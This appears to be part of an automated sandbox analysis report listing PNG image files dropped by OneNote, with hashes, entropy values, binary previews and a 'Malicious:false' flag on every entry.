                                                                                                                                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4847
                                                                                                                                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):17289
                                                                                                                                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14458
                                                                                                                                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2599
                                                                                                                                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4847
                                                                                                                                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13030
                                                                                                                                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):5386
                                                                                                                                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1570
                                                                                                                                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2210
                                                                                                                                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4081
                                                                                                                                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                                  Malicious:false
